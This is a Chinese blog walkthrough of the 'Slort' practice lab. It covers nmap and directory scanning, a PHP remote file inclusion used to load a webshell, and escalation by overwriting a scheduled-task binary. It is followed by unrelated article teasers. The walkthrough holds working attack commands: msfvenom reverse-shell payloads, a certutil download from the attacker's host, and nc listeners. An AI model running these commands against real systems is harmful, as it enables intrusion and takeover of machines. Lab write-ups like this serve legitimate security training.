OSCP靶场--Slort

OSCP靶场–Slort

考点(1.php 远程文件包含 2.定时任务提权)

1.nmap扫描

                                                                                                                 
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.178.53 -sV -sC -p-  --min-rate 5000 
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-24 04:37 EST
Nmap scan report for 192.168.178.53
Host is up (0.28s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp   open  msrpc         Microsoft Windows RPC                                                              
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                      
445/tcp   open  microsoft-ds?                                                                                    
3306/tcp  open  mysql?                                                                                           
| fingerprint-strings:                                                                                           
|   DNSVersionBindReqTCP, JavaRMI, LPDString, NULL:                                                              
|_    Host '192.168.45.179' is not allowed to connect to this MariaDB server                                     
4443/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)                             
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6                                             
| http-title: Welcome to XAMPP                                                                                   
|_Requested resource was http://192.168.178.53:4443/dashboard/                                                   
5040/tcp  open  unknown                                                                                          
7680/tcp  open  pando-pub?                                                                                       
8080/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)                             
|_http-open-proxy: Proxy might be redirecting requests                                                           
| http-title: Welcome to XAMPP                                                                                   
|_Requested resource was http://192.168.178.53:8080/dashboard/                                                   
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6                                             
49664/tcp open  msrpc         Microsoft Windows RPC                                                              
49665/tcp open  msrpc         Microsoft Windows RPC                                                              
49666/tcp open  msrpc         Microsoft Windows RPC                                                              
49667/tcp open  msrpc         Microsoft Windows RPC                                                              
49668/tcp open  msrpc         Microsoft Windows RPC                                                                              
49669/tcp open  msrpc         Microsoft Windows RPC                                                                              
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :                                                                                      
SF-Port3306-TCP:V=7.92%I=7%D=2/24%Time=65D9B8F4%P=x86_64-pc-linux-gnu%r(NU                                                       
SF:LL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20not\x20al                                                       
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNSVersio
SF:nBindReqTCP,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20
SF:not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(
SF:LPDString,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20no
SF:t\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Ja
SF:vaRMI,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20not\x2
SF:0allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: -1s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-02-24T09:40:46
|_  start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 203.85 seconds

2.user priv

2.1 目录扫描

┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.178.53:8080/_|. _ _  _  _  _ _|_    v0.4.2(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927Output File: /root/.dirsearch/reports/192.168.178.53-8080/-_24-02-24_05-44-47.txtError Log: /root/.dirsearch/logs/errors-24-02-24_05-44-47.logTarget: http://192.168.178.53:8080/[05:44:48] Starting: 
[05:44:51] 403 -    1KB - /%C0%AE%C0%AE%C0%AF                              
[05:44:51] 403 -    1KB - /%3f/
[05:44:52] 403 -    1KB - /%ff                                             
[05:44:59] 403 -    1KB - /.ht_wsr.txt                                     
[05:44:59] 403 -    1KB - /.htaccess.bak1
[05:44:59] 403 -    1KB - /.htaccess.sample
[05:44:59] 403 -    1KB - /.htaccess.save                                  
[05:44:59] 403 -    1KB - /.htaccess.orig
[05:44:59] 403 -    1KB - /.htaccess_extra
[05:44:59] 403 -    1KB - /.htaccess_orig
[05:44:59] 403 -    1KB - /.htaccess_sc
[05:44:59] 403 -    1KB - /.htaccessBAK
[05:44:59] 403 -    1KB - /.htaccessOLD
[05:44:59] 403 -    1KB - /.htaccessOLD2
[05:44:59] 403 -    1KB - /.htm                                            
[05:44:59] 403 -    1KB - /.html                                           
[05:44:59] 403 -    1KB - /.htpasswd_test
[05:44:59] 403 -    1KB - /.htpasswds
[05:44:59] 403 -    1KB - /.httr-oauth
[05:45:17] 403 -    1KB - /Trace.axd::$DATA                                 
[05:45:19] 200 -  782B  - /Webalizer/                                       
[05:45:47] 403 -    1KB - /cgi-bin/                                         
[05:45:47] 500 -    1KB - /cgi-bin/printenv.pl                              
[05:45:52] 301 -  351B  - /dashboard  ->  http://192.168.178.53:8080/dashboard/
[05:45:52] 200 -    6KB - /dashboard/howto.html                             
[05:45:53] 200 -   31KB - /dashboard/faq.html                               
[05:45:53] 200 -   78KB - /dashboard/phpinfo.php                            
[05:45:59] 403 -    1KB - /error/                                           
[05:46:01] 200 -   30KB - /favicon.ico                                      
[05:46:02] 503 -    1KB - /examples                                         
[05:46:02] 503 -    1KB - /examples/                                        
[05:46:02] 503 -    1KB - /examples/servlet/SnoopServlet
[05:46:02] 503 -    1KB - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[05:46:02] 503 -    1KB - /examples/jsp/snp/snoop.jsp
[05:46:02] 503 -    1KB - /examples/servlets/servlet/CookieExample          
[05:46:02] 503 -    1KB - /examples/servlets/index.html
[05:46:02] 503 -    1KB - /examples/servlets/servlet/RequestHeaderExample
[05:46:06] 301 -  345B  - /img  ->  http://192.168.178.53:8080/img/         
[05:46:07] 302 -    0B  - /index.php  ->  http://192.168.178.53:8080/dashboard/
[05:46:07] 302 -    0B  - /index.pHp  ->  http://192.168.178.53:8080/dashboard/
[05:46:07] 302 -    0B  - /index.php/login/  ->  http://192.168.178.53:8080/dashboard/
[05:46:07] 302 -    0B  - /index.php.  ->  http://192.168.178.53:8080/dashboard/
[05:46:07] 403 -    1KB - /index.php::$DATA                                 
[05:46:21] 403 -    1KB - /phpmyadmin/ChangeLog                             
[05:46:21] 403 -    1KB - /phpmyadmin/doc/html/index.html
[05:46:21] 403 -    1KB - /phpmyadmin/docs/html/index.html
[05:46:21] 403 -    1KB - /phpmyadmin/README                                
[05:46:22] 403 -    1KB - /phpmyadmin                                       
[05:46:24] 403 -    1KB - /phpmyadmin/                                      
[05:46:24] 403 -    1KB - /phpmyadmin/index.php
[05:46:24] 403 -    1KB - /phpmyadmin/phpmyadmin/index.php                  
[05:46:24] 403 -    1KB - /phpmyadmin/scripts/setup.php
[05:46:31] 403 -    1KB - /server-status/                                   
[05:46:31] 403 -    1KB - /server-status
[05:46:31] 403 -    1KB - /server-info
[05:46:33] 301 -  346B  - /site  ->  http://192.168.178.53:8080/site/       
[05:46:34] 301 -   27B  - /site/  ->  index.php?page=main.php               
[05:46:46] 403 -    1KB - /web.config::$DATA                                
[05:46:46] 403 -    1KB - /webalizer                                        
[05:46:49] 200 -  774B  - /xampp/                                           Task Completed     

2.2 发现php LFI漏洞:

在这里插入图片描述
包含phpinfo.php文件:
在这里插入图片描述

2.3 发现存在php RFI漏洞:

在这里插入图片描述

2.4 利用RFI获取webshell:

php正向webshell地址:https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php
在这里插入图片描述

2.5 转到交互式shell

##
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -f exe -o shell443.exe##
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80## webshell上传shell443.exe
## 执行shell443.exe##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443## local.txt
c:\Users\rupert\Desktop>type local.txt
type local.txt
345738c06042482d447a067226c9bfa7

在这里插入图片描述
在这里插入图片描述
local.txt
在这里插入图片描述

3.root priv

3.1 winpeas.exe:

## 
File: C:\xampp\phpMyAdmin\config.inc.php

在这里插入图片描述

3.2 发现定时任务:

在这里插入图片描述
在这里插入图片描述

3.3 覆盖定时任务二进制文件提权:

##
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -f exe -o TFTP.EXE ##
c:\Backup>certutil -urlcache -split -f http://192.168.45.179/TFTP.EXE##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443            

在这里插入图片描述

4.总结

## 考点:
### 1.远程文件包含
### 2.定时任务提权

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/700540.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

二手旧物回收系统开发:推动可持续发展的关键

随着人们环保意识的增强,二手旧物回收系统的发展逐渐成为社会关注的焦点。开发二手旧物回收系统,不仅能有效减少废弃物的排放,降低对环境的污染,还能实现资源的循环利用,推动可持续发展。本文将深入探讨二手旧物回收系…

java8新特性-Lambda

目录 一、Lambda 1、什么是Lambda表达式 2.Lambda表达式的基本语法: 3.参数列表 4.Lambda表达式使用前后对比 举例一: 举例二: 二、函数式接口 1.函数式接口的使用说明 2.4个基本的函数式接口 3.如何定义函数接口 1.保证接口中只…

Javaweb之SpringBootWeb案例之AOP案例的详细解析

4. AOP案例 SpringAOP的相关知识我们就已经全部学习完毕了。最后我们要通过一个案例来对AOP进行一个综合的应用。 4.1 需求 需求:将案例中增、删、改相关接口的操作日志记录到数据库表中 就是当访问部门管理和员工管理当中的增、删、改相关功能接口时&#xff0c…

MyBatis之Mapper.xml文件中parameterType,resultType,resultMap的用法

MyBatis之自定义数据类型转换器 前言1.parameterType2.resultType3.resultMap实例代码总结 前言 今天我们来学习Mapper.xml(编写SQL的)文件中,增删改查标签中,使用parameterType属性指定传递参数类型,resultType属性指…

【Java程序设计】【C00291】基于Springboot的网上图书商城(有论文)

基于Springboot的网上图书商城(有论文) 项目简介项目获取开发环境项目技术运行截图 项目简介 这是一个基于Springboot的网上图书商城 本系统分为系统功能模块、管理员功能模块以及卖家功能模块。 系统功能模块:在系统首页可以查看首页、图书…

GEE必须会教程—Map工具的使用

一个星期的时间,跟着小编的角度,我们已经学习了数值、字符串、字典、列表、日期、矩阵等基本的编程数据类型,这些是学习任何一门编程语言都需要掌握的知识,还有不懂得赶紧关注小编,进行主页查看过往文章!! …

离散数学 第八单元 布尔代数

目录 1. 布尔函数 2. duality 二元性 3. 表示布尔函数的布尔表达式 sum-of-products expansions 4. Functional Completeness 5. Logic Gates 逻辑门​​​​​​​ 4. 最小化 K-map卡诺图 Quine-McCluskey法 1. 布尔函数 嗯也就是我要知道布尔代数是啥形式&#xff…

【Spring】 AOP面向切面编程

文章目录 AOP是什么?一、AOP术语名词介绍二、Spring AOP框架介绍和关系梳理三、Spring AOP基于注解方式实现和细节3.1 Spring AOP底层技术组成3.2 初步实现3.3 获取通知细节信息3.4 切点表达式语法3.5 重用(提取)切点表达式3.6 环绕通知3.7 切…

【RAG实践】基于LlamaIndex和Qwen1.5搭建基于本地知识库的问答机器人

什么是RAG LLM会产生误导性的 “幻觉”,依赖的信息可能过时,处理特定知识时效率不高,缺乏专业领域的深度洞察,同时在推理能力上也有所欠缺。 正是在这样的背景下,检索增强生成技术(Retrieval-Augmented G…

家庭装修的施工流程与工艺,新房装修的实用技术与方法

一、教程描述 对于第一次装修新房的朋友来说,做好装修的准备工作是非常必要的,起码应该了解新房装修的基本施工流程。家庭装修的施工顺序:1,购买材料开工进场;2,水电:开槽布线,铺设…

Samba文件夹有的能访问,有的不能解决办法(samba无法访问、samba文件夹打不开)需要把selinux设置为Permissive宽容模式

文章目录 如果有的目录能访问有的不能访问大概率是selinux设置了Enforcing强制模式需要把selinux设置为Permissive宽容模式或者Disabled禁用参考文章 如果有的目录能访问 有的不能访问 大概率是selinux设置了Enforcing强制模式 需要把selinux设置为Permissive宽容模式或者Di…

TYPE-C接口桌面显示器:视频与充电的双重革新

在现代科技的浪潮中,TYPE-C接口桌面显示器崭露头角,它不仅仅是一台显示器,更是充电与视频传输的完美融合。这种新型的显示器,凭借其TYPE-C接口,实现了从DC电源到PD协议充电的华丽转身,为众多设备如笔记本电…

Stable Diffusion 绘画入门教程(webui)-ControlNet(Tile/Blur)

上篇文章介绍了y语义分割Seg,这篇文章介绍下Tile/Blur(增加/减少细节) Tile用于增加图片细节,一般用于高清修复,Blur用于减少图片细节(图片模糊),如下图,用Tile做修复&a…

【Vue渗透】Vue Devtools 浏览器插件

下载地址 Vue Devtools 浏览器插件 Vue站点渗透思路 【Vue渗透】Vue站点渗透思路 简介 Vue Devtools 是 Vue 官方发布的调试浏览器插件,可以安装在 Chrome 和 Firefox 等浏览器上,直接内嵌在开发者工具中,使用体验流畅。Vue Devtools 由…

HEVC视频编解码标准学习笔记-1

视频编解码标准H.265/HEVC(High Efficiency Video Coding)通过将视频数据编码为更高效格式,大幅改善了视频流的压缩效率。这里主要介绍Tile、Slice和CTU的定义,以及介绍这些技术组件之间的相互关系。 CTU(编码树单元&…

【蓝牙协议栈】btsnoop 概念介绍

1. btsnoop 概念介绍 btsnoop 用于记录蓝牙协议栈跟芯片交互的数据。在分析蓝牙问题的时候有很大的用途,能够快速定位问题所在,一般协议栈都有整合这个或者类似功能,否则我不认为这个协议栈是一个合格的协议栈,在 android 手机中…

AI时代显卡如何选择,B100、H200、L40S、A100、H100、V100 含架构技术和性能对比

AI时代显卡如何选择,B100、H200、L40S、A100、H100、V100 含架构技术和性能对比。 英伟达系列显卡大解析B100、H200、L40S、A100、A800、H100、H800、V100如何选择,含架构技术和性能对比带你解决疑惑。 近期,AIGC领域呈现出一片繁荣景象&a…

可变参数、Collections类

一、可变参数 定义:是一种特殊的形参,定义在方法、构造器的形参列表里 格式:数据类型...参数名称 特点:可以不传数据,也可以传一个或者多个数据给它,也可以传一个数组 好处:可以灵活接收数据…

探索无限维度的奥秘:Hilbert空间

当我们提到空间,你可能会立即想到周遭的环境——三维世界,其中事物可以向上或向下、左或右、前或后移动。然而,在数学和物理学的世界里,有一种抽象的空间概念,它不仅覆盖了我们的三维空间,还包括了更复杂的…

C++笔记:二叉搜索树(Binary Search Tree)

文章目录 二叉搜索树的概念二叉搜索树操作1. 框架搭建2. 遍历3. 查找迭代实现递归实现 4. 插入迭代实现递归实现 5. 删除迭代实现递归实现 6. 析构与销毁7. 拷贝构造与赋值重载 二叉搜索树的应用二叉搜索树的性能分析二叉搜索树模拟实现源码 二叉搜索树的概念 二叉搜索树又称二…